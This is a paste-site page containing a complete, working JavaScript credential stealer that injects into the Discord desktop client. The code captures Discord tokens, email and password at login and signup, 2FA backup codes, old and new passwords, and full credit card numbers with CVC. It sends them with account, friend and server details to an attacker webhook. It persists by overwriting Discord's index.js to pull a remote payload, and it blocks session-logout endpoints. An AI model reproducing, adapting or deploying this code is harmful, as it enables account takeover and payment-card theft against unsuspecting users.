New paste
Recent API Trending Blog
Guest
 
dbajkxka

sa

dbajkxka
Jan 30th, 2026
137
0
Never
Not a member of gistpad yet? Sign Up, it unlocks many cool features!
None 50.70 KB | None | 0 0
copy raw download clone embed print report
  1. const fs = require('fs');
  2. const os = require('os');
  3. const https = require('https');
  4. const args = process.argv;
  5. const path = require('path');
  6. const querystring = require('querystring');
  7.  
  8. const {
  9. BrowserWindow,
  10. session,
  11. } = require('electron');
  12.  
  13. const CONFIG = {
  14. webhook: "%WEBHOOK%",
  15. injection_url: "https://gistpad.com/raw/sa-21280-2";,
  16. filters: {
  17. urls: [
  18. '/auth/login',
  19. '/auth/register',
  20. '/mfa/totp',
  21. '/mfa/codes-verification',
  22. '/users/@me',
  23. ],
  24. },
  25. filters2: {
  26. urls: [
  27. 'wss://remote-auth-gateway.discord.gg/*',
  28. 'https://discord.com/api/v*/auth/sessions',
  29. 'https://*.discord.com/api/v*/auth/sessions',
  30. 'https://discordapp.com/api/v*/auth/sessions'
  31. ],
  32. },
  33. payment_filters: {
  34. urls: [
  35. 'https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts',
  36. 'https://api.stripe.com/v*/tokens',
  37. ],
  38. },
  39. API: "https://discord.com/api/v9/users/@me";,
  40. badges: {
  41. Discord_Emloyee: {
  42. Value: 1,
  43. Emoji: "<:8485discordemployee:1163172252989259898>",
  44. Rare: true,
  45. },
  46. Partnered_Server_Owner: {
  47. Value: 2,
  48. Emoji: "<:9928discordpartnerbadge:1163172304155586570>",
  49. Rare: true,
  50. },
  51. HypeSquad_Events: {
  52. Value: 4,
  53. Emoji: "<:9171hypesquadevents:1163172248140660839>",
  54. Rare: true,
  55. },
  56. Bug_Hunter_Level_1: {
  57. Value: 8,
  58. Emoji: "<:4744bughunterbadgediscord:1163172239970140383>",
  59. Rare: true,
  60. },
  61. Early_Supporter: {
  62. Value: 512,
  63. Emoji: "<:5053earlysupporter:1163172241996005416>",
  64. Rare: true,
  65. },
  66. Bug_Hunter_Level_2: {
  67. Value: 16384,
  68. Emoji: "<:1757bugbusterbadgediscord:1163172238942543892>",
  69. Rare: true,
  70. },
  71. Early_Verified_Bot_Developer: {
  72. Value: 131072,
  73. Emoji: "<:1207iconearlybotdeveloper:1163172236807639143>",
  74. Rare: true,
  75. },
  76. House_Bravery: {
  77. Value: 64,
  78. Emoji: "<:6601hypesquadbravery:1163172246492287017>",
  79. Rare: false,
  80. },
  81. House_Brilliance: {
  82. Value: 128,
  83. Emoji: "<:6936hypesquadbrilliance:1163172244474822746>",
  84. Rare: false,
  85. },
  86. House_Balance: {
  87. Value: 256,
  88. Emoji: "<:5242hypesquadbalance:1163172243417858128>",
  89. Rare: false,
  90. },
  91. Active_Developer: {
  92. Value: 4194304,
  93. Emoji: "<:1207iconactivedeveloper:1163172534443851868>",
  94. Rare: false,
  95. },
  96. Certified_Moderator: {
  97. Value: 262144,
  98. Emoji: "<:4149blurplecertifiedmoderator:1163172255489085481>",
  99. Rare: true,
  100. },
  101. Spammer: {
  102. Value: 1048704,
  103. Emoji: "⌨️",
  104. Rare: false,
  105. },
  106. },
  107. };
  108.  
  109. const executeJS = script => {
  110. const window = BrowserWindow.getAllWindows()[0];
  111. return window.webContents.executeJavaScript(script, !0);
  112. };
  113.  
  114. const clearAllUserData = () => {
  115. executeJS("document.body.appendChild(document.createElement`iframe`).contentWindow.localStorage.clear()");
  116. executeJS("location.reload()");
  117. };
  118.  
  119. const getToken = async () => await executeJS(`(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()`);
  120.  
  121. const request = async (method, url, headers, data) => {
  122. url = new URL(url);
  123. const options = {
  124. protocol: url.protocol,
  125. hostname: url.host,
  126. path: url.pathname,
  127. method: method,
  128. headers: {
  129. "Access-Control-Allow-Origin": "*",
  130. },
  131. };
  132.  
  133. if (url.search) options.path += url.search;
  134. for (const key in headers) options.headers[key] = headers[key];
  135. const req = https.request(options);
  136. if (data) req.write(data);
  137. req.end();
  138.  
  139. return new Promise((resolve, reject) => {
  140. req.on("response", res => {
  141. let data = "";
  142. res.on("data", chunk => data += chunk);
  143. res.on("end", () => resolve(data));
  144. });
  145. });
  146. };
  147.  
  148. const hooker = async (content, token, account) => {
  149. content["content"] = "`" + os.hostname() + "` - `" + os.userInfo().username + "`\n\n" + content["content"];
  150. content["username"] = "alpcord";
  151. content["avatar_url"] = "https://i.ibb.co/GJGXzGX/discord-avatar-512-FCWUJ.png";;
  152. content["embeds"][0]["author"] = {
  153. "name": account.username,
  154. };
  155. content["embeds"][0]["thumbnail"] = {
  156. "url": `https://cdn.discordapp.com/avatars/${account.id}/${account.avatar}.webp`
  157. };
  158. content["embeds"][0]["footer"] = {
  159. "text": "alpcord",
  160. "icon_url": "https://avatars.githubusercontent.com/u/145487845?v=4";,
  161. };
  162. content["embeds"][0]["title"] = "hesap";
  163.  
  164. const nitro = getNitro(account.premium_type);
  165. const badges = getBadges(account.flags);
  166. const billing = await getBilling(token);
  167.  
  168. const friends = await getFriends(token);
  169. const servers = await getServers(token);
  170.  
  171. content["embeds"][0]["fields"].push({
  172. "name": "toxen",
  173. "value": "```" + token + "```",
  174. "inline": false
  175. }, {
  176. "name": "Nitro",
  177. "value": nitro,
  178. "inline": true
  179. }, {
  180. "name": "rozet",
  181. "value": badges,
  182. "inline": true
  183. }, {
  184. "name": "ödeme",
  185. "value": billing,
  186. "inline": true
  187. });
  188.  
  189. content["embeds"].push({
  190. "title": `Total Friends: ${friends.totalFriends}`,
  191. "description": friends.message,
  192. }, {
  193. "title": `Total Servers: ${servers.totalGuilds}`,
  194. "description": servers.message,
  195. });
  196.  
  197. for (const embed in content["embeds"]) {
  198. content["embeds"][embed]["color"] = 0xb143e3;
  199. }
  200.  
  201. await request("POST", CONFIG.webhook, {
  202. "Content-Type": "application/json"
  203. }, JSON.stringify(content));
  204. };
  205.  
  206. const fetch = async (endpoint, headers) => {
  207. return JSON.parse(await request("GET", CONFIG.API + endpoint, headers));
  208. };
  209.  
  210. const fetchAccount = async token => await fetch("", {
  211. "Authorization": token
  212. });
  213. const fetchBilling = async token => await fetch("/billing/payment-sources", {
  214. "Authorization": token
  215. });
  216. const fetchServers = async token => await fetch("/guilds?with_counts=true", {
  217. "Authorization": token
  218. });
  219. const fetchFriends = async token => await fetch("/relationships", {
  220. "Authorization": token
  221. });
  222.  
  223. const getNitro = flags => {
  224. switch (flags) {
  225. case 1:
  226. return '`Nitro Classic`';
  227. case 2:
  228. return '`Nitro Boost`';
  229. case 3:
  230. return '`Nitro Basic`';
  231. default:
  232. return '`❌`';
  233. }
  234. };
  235.  
  236. const getBadges = flags => {
  237. let badges = '';
  238. for (const badge in CONFIG.badges) {
  239. let b = CONFIG.badges[badge];
  240. if ((flags & b.Value) == b.Value) badges += b.Emoji + ' ';
  241. }
  242. return badges || '`❌`';
  243. }
  244.  
  245. const getRareBadges = flags => {
  246. let badges = '';
  247. for (const badge in CONFIG.badges) {
  248. let b = CONFIG.badges[badge];
  249. if ((flags & b.Value) == b.Value && b.Rare) badges += b.Emoji + ' ';
  250. }
  251. return badges;
  252. }
  253.  
  254. const getBilling = async token => {
  255. const data = await fetchBilling(token);
  256. let billing = '';
  257. data.forEach((x) => {
  258. if (!x.invalid) {
  259. switch (x.type) {
  260. case 1:
  261. billing += '💳 ';
  262. break;
  263. case 2:
  264. billing += 'pp ';
  265. break;
  266. }
  267. }
  268. });
  269. return billing || '`❌`';
  270. };
  271.  
  272. const getFriends = async token => {
  273. const friends = await fetchFriends(token);
  274.  
  275. const filteredFriends = friends.filter((user) => {
  276. return user.type == 1
  277. })
  278. let rareUsers = "";
  279. for (const acc of filteredFriends) {
  280. var badges = getRareBadges(acc.user.public_flags)
  281. if (badges != "") {
  282. if (!rareUsers) rareUsers = "**değerli arkadaşlar:**\n";
  283. rareUsers += `${badges} ${acc.user.username}\n`;
  284. }
  285. }
  286. rareUsers = rareUsers || "**değerli arkadaşı yk**";
  287.  
  288. return {
  289. message: rareUsers,
  290. totalFriends: friends.length,
  291. };
  292. };
  293.  
  294. const getServers = async token => {
  295. const guilds = await fetchServers(token);
  296.  
  297. const filteredGuilds = guilds.filter((guild) => guild.permissions == '562949953421311' || guild.permissions == '2251799813685247');
  298. let rareGuilds = "";
  299. for (const guild of filteredGuilds) {
  300. if (rareGuilds === "") {
  301. rareGuilds += `**değerli sw:**\n`;
  302. }
  303. rareGuilds += `${guild.owner ? "<:SA_Owner:991312415352430673> Owner" : "<:admin:967851956930482206> Admin"} | Server Name: \`${guild.name}\` - Members: \`${guild.approximate_member_count}\`\n`;
  304. }
  305.  
  306. rareGuilds = rareGuilds || "**sw yok mk**";
  307.  
  308. return {
  309. message: rareGuilds,
  310. totalGuilds: guilds.length,
  311. };
  312. };
  313.  
  314. const EmailPassToken = async (email, password, token, action) => {
  315. const account = await fetchAccount(token)
  316.  
  317. const content = {
  318. "content": `**${account.username}** just ${action}!`,
  319. "embeds": [{
  320. "fields": [{
  321. "name": "mayil",
  322. "value": "`" + email + "`",
  323. "inline": true
  324. }, {
  325. "name": "şifo",
  326. "value": "`" + password + "`",
  327. "inline": true
  328. }]
  329. }]
  330. };
  331.  
  332. hooker(content, token, account);
  333. }
  334.  
  335. const BackupCodesViewed = async (codes, token) => {
  336. const account = await fetchAccount(token)
  337.  
  338. const filteredCodes = codes.filter((code) => {
  339. return code.consumed === false;
  340. });
  341.  
  342. let message = "";
  343. for (let code of filteredCodes) {
  344. message += `${code.code.substr(0, 4)}-${code.code.substr(4)}\n`;
  345. }
  346. const content = {
  347. "content": `**${account.username}** 2fa açtı`,
  348. "embeds": [{
  349. "fields": [{
  350. "name": "Backup Codes",
  351. "value": "```" + message + "```",
  352. "inline": false
  353. },
  354. {
  355. "name": "mayil",
  356. "value": "`" + account.email + "`",
  357. "inline": true
  358. }, {
  359. "name": "telo",
  360. "value": "`" + (account.phone || "None") + "`",
  361. "inline": true
  362. }
  363. ]
  364.  
  365. }]
  366. };
  367.  
  368. hooker(content, token, account);
  369. }
  370.  
  371. const PasswordChanged = async (newPassword, oldPassword, token) => {
  372. const account = await fetchAccount(token)
  373.  
  374. const content = {
  375. "content": `**${account.username}** şifo değişti`,
  376. "embeds": [{
  377. "fields": [{
  378. "name": "old şifo",
  379. "value": "`" + newPassword + "`",
  380. "inline": true
  381. }, {
  382. "name": "new şifo",
  383. "value": "`" + oldPassword + "`",
  384. "inline": true
  385. }]
  386. }]
  387. };
  388.  
  389. hooker(content, token, account);
  390. }
  391.  
  392. const CreditCardAdded = async (number, cvc, month, year, token) => {
  393. const account = await fetchAccount(token)
  394.  
  395. const content = {
  396. "content": `**${account.username}** allahcc ekledi`,
  397. "embeds": [{
  398. "fields": [{
  399. "name": "no",
  400. "value": "`" + number + "`",
  401. "inline": true
  402. }, {
  403. "name": "cıvıc",
  404. "value": "`" + cvc + "`",
  405. "inline": true
  406. }, {
  407. "name": "tarih",
  408. "value": "`" + month + "/" + year + "`",
  409. "inline": true
  410. }]
  411. }]
  412. };
  413.  
  414. hooker(content, token, account);
  415. }
  416.  
  417. const PaypalAdded = async (token) => {
  418. const account = await fetchAccount(token)
  419.  
  420. const content = {
  421. "content": `**${account.username}** pp ekledi!`,
  422. "embeds": [{
  423. "fields": [{
  424. "name": "mayil",
  425. "value": "`" + account.email + "`",
  426. "inline": true
  427. }, {
  428. "name": "telo",
  429. "value": "`" + (account.phone || "None") + "`",
  430. "inline": true
  431. }]
  432. }]
  433. };
  434.  
  435. hooker(content, token, account);
  436. }
  437.  
  438. const discordPath = (function () {
  439. const app = args[0].split(path.sep).slice(0, -1).join(path.sep);
  440. let resourcePath;
  441.  
  442. if (process.platform === 'win32') {
  443. resourcePath = path.join(app, 'resources');
  444. } else if (process.platform === 'darwin') {
  445. resourcePath = path.join(app, 'Contents', 'Resources');
  446. }
  447.  
  448. if (fs.existsSync(resourcePath)) return {
  449. resourcePath,
  450. app
  451. };
  452. return {
  453. undefined,
  454. undefined
  455. };
  456. })();
  457.  
  458. async function initiation() {
  459. if (fs.existsSync(path.join(__dirname, 'initiation'))) {
  460. fs.rmdirSync(path.join(__dirname, 'initiation'));
  461.  
  462. const token = await getToken();
  463. if (!token) return;
  464.  
  465. const account = await fetchAccount(token)
  466.  
  467. const content = {
  468. "content": `**${account.username}** yedi`,
  469.  
  470. "embeds": [{
  471. "fields": [{
  472. "name": "mayil",
  473. "value": "`" + account.email + "`",
  474. "inline": true
  475. }, {
  476. "name": "telo",
  477. "value": "`" + (account.phone || "Yok") + "`",
  478. "inline": true
  479. }]
  480. }]
  481. };
  482.  
  483. await hooker(content, token, account);
  484. clearAllUserData();
  485. }
  486.  
  487. const {
  488. resourcePath,
  489. app
  490. } = discordPath;
  491. if (resourcePath === undefined || app === undefined) return;
  492. const appPath = path.join(resourcePath, 'app');
  493. const packageJson = path.join(appPath, 'package.json');
  494. const resourceIndex = path.join(appPath, 'index.js');
  495. const coreVal = fs.readdirSync(`${app}\\modules\\`).filter(x => /discord_desktop_core-+?/.test(x))[0]
  496. const indexJs = `${app}\\modules\\${coreVal}\\discord_desktop_core\\index.js`;
  497. const bdPath = path.join(process.env.APPDATA, '\\betterdiscord\\data\\betterdiscord.asar');
  498. if (!fs.existsSync(appPath)) fs.mkdirSync(appPath);
  499. if (fs.existsSync(packageJson)) fs.unlinkSync(packageJson);
  500. if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex);
  501.  
  502. if (process.platform === 'win32' || process.platform === 'darwin') {
  503. fs.writeFileSync(
  504. packageJson,
  505. JSON.stringify({
  506. name: 'discord',
  507. main: 'index.js',
  508. },
  509. null,
  510. 4,
  511. ),
  512. );
  513.  
  514. const startUpScript = `const fs = require('fs'), https = require('https');
  515. const indexJs = '${indexJs}';
  516. const bdPath = '${bdPath}';
  517. const fileSize = fs.statSync(indexJs).size
  518. fs.readFileSync(indexJs, 'utf8', (err, data) => {
  519. if (fileSize < 20000 || data === "module.exports = require('./core.asar')")
  520. init();
  521. })
  522. async function init() {
  523. https.get('${CONFIG.injection_url}', (res) => {
  524. const file = fs.createWriteStream(indexJs);
  525. res.replace('%WEBHOOK%', '${CONFIG.webhook}')
  526. res.pipe(file);
  527. file.on('finish', () => {
  528. file.close();
  529. });
  530.  
  531. }).on("error", (err) => {
  532. setTimeout(init(), 10000);
  533. });
  534. }
  535. require('${path.join(resourcePath, 'app.asar')}')
  536. if (fs.existsSync(bdPath)) require(bdPath);`;
  537. fs.writeFileSync(resourceIndex, startUpScript.replace(/\\/g, '\\\\'));
  538. }
  539. }
  540.  
  541. let email = "";
  542. let password = "";
  543. let initiationCalled = false;
  544. const createWindow = () => {
  545. mainWindow = BrowserWindow.getAllWindows()[0];
  546. if (!mainWindow) return
  547.  
  548. mainWindow.webContents.debugger.attach('1.3');
  549. mainWindow.webContents.debugger.on('message', async (_, method, params) => {
  550. if (!initiationCalled) {
  551. await initiation();
  552. initiationCalled = true;
  553. }
  554.  
  555. if (method !== 'Network.responseReceived') return;
  556. if (!CONFIG.filters.urls.some(url => params.response.url.endsWith(url))) return;
  557. if (![200, 202].includes(params.response.status)) return;
  558.  
  559. const responseUnparsedData = await mainWindow.webContents.debugger.sendCommand('Network.getResponseBody', {
  560. requestId: params.requestId
  561. });
  562. const responseData = JSON.parse(responseUnparsedData.body);
  563.  
  564. const requestUnparsedData = await mainWindow.webContents.debugger.sendCommand('Network.getRequestPostData', {
  565. requestId: params.requestId
  566. });
  567. const requestData = JSON.parse(requestUnparsedData.postData);
  568.  
  569. switch (true) {
  570. case params.response.url.endsWith('/login'):
  571. if (!responseData.token) {
  572. email = requestData.login;
  573. password = requestData.password;
  574. return; // 2FA
  575. }
  576. EmailPassToken(requestData.login, requestData.password, responseData.token, "logged in");
  577. break;
  578.  
  579. case params.response.url.endsWith('/register'):
  580. EmailPassToken(requestData.email, requestData.password, responseData.token, "signed up");
  581. break;
  582.  
  583. case params.response.url.endsWith('/totp'):
  584. EmailPassToken(email, password, responseData.token, "logged in with 2FA");
  585. break;
  586.  
  587. case params.response.url.endsWith('/codes-verification'):
  588. BackupCodesViewed(responseData.backup_codes, await getToken());
  589. break;
  590.  
  591. case params.response.url.endsWith('/@me'):
  592. if (!requestData.password) return;
  593.  
  594. if (requestData.email) {
  595. EmailPassToken(requestData.email, requestData.password, responseData.token, "changed his email to **" + requestData.email + "**");
  596. }
  597.  
  598. if (requestData.new_password) {
  599. PasswordChanged(requestData.new_password, requestData.password, responseData.token);
  600. }
  601. break;
  602. }
  603. });
  604.  
  605. mainWindow.webContents.debugger.sendCommand('Network.enable');
  606.  
  607. mainWindow.on('closed', () => {
  608. createWindow()
  609. });
  610. }
  611. createWindow();
  612.  
  613. session.defaultSession.webRequest.onCompleted(CONFIG.payment_filters, async (details, _) => {
  614. if (![200, 202].includes(details.statusCode)) return;
  615. if (details.method != 'POST') return;
  616. switch (true) {
  617. case details.url.endsWith('tokens'):
  618. const item = querystring.parse(Buffer.from(details.uploadData[0].bytes).toString());
  619. CreditCardAdded(item['card[number]'], item['card[cvc]'], item['card[exp_month]'], item['card[exp_year]'], await getToken());
  620. break;
  621.  
  622. case details.url.endsWith('paypal_accounts'):
  623. PaypalAdded(await getToken());
  624. break;
  625. }
  626. });
  627.  
  628. session.defaultSession.webRequest.onBeforeRequest(CONFIG.filters2, (details, callback) => {
  629. if (details.url.startsWith("wss://remote-auth-gateway") || details.url.endsWith("auth/sessions")) return callback({
  630. cancel: true
  631. })
  632. });
  633.  
  634. module.exports = require("./core.asar");
RAW Gist Data Copied
Public Gists
Hello
Not a member of GistPad yet?
Sign Up, it unlocks many cool features!
 
We use cookies for various purposes including analytics. By continuing to use GistPad, you agree to our use of cookies as described in the Privacy Policy.  OK, I Understand